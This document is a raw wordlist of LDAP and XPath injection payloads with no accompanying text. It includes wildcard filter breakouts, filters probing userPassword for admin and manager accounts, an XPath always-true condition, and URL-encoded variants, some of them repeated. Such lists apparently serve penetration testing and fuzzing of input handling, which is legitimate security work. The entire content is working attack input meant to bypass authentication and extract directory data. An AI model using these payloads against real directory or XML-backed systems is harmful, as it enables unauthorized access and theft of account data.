*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*)(cn=*
ldap*)(cn=*
ldap*)(pager=*
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
manager*
admin*)((|userpassword=*)
manager*)((|userpassword=*)
admin*)((|userPassword=*)
manager*)((|userPassword=*)
x' or name()='username' or 'x'='y
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
*)(uid=*))(|(uid=*
